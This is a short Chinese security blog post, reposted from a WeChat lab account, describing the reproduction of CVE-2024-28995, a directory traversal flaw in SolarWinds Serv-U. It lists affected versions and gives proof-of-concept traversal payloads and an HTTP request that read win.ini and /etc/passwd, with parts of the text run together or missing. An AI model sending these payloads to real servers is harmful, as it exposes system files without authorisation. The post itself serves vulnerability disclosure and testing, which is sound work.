SolarWinds Serv-U File Server是美国SolarWinds公司的一款文件传输服务器。
SolarWinds Serv-U存在路径遍历漏洞,该漏洞源于容易受到目录横向的影响,允许访问读取主机上的敏感文件。
2、 SolarWinds Serv-U Gateway <= 15.4.2 Hotfix 1
3、 SolarWinds Serv-U MFT Server <= 15.4.2 Hotfix 1
4、 (注意:Serv-U 版本15.3.2及更早版本将于 2025 年 2 月终止使用,并且此版本以下的所有版本都已终止使用并且不再受支持。)
1.访问漏洞环境
POC
漏洞复现
win
/?InternalDir=/../../../../Windows/&InternalFile=win.iniLinux
/?InternalDir=........etc&InternalFile=passwd漏洞复现
GET /?InternalDir=/../../../../Windows/&InternalFile=win.ini HTTP/1.1Host: 127.0.0.1Content-Type: application/x-www-form-urlencoded
读文件win.ini成功。
3.Yakit工具加载nuclei文件测试(漏洞存在)
https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28995https://ti.qianxin.com/vulnerability/detail/355260
原文始发于微信公众号(弥天安全实验室):【成功复现】SolarWinds Serv-U目录遍历漏洞(CVE-2024-28995)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论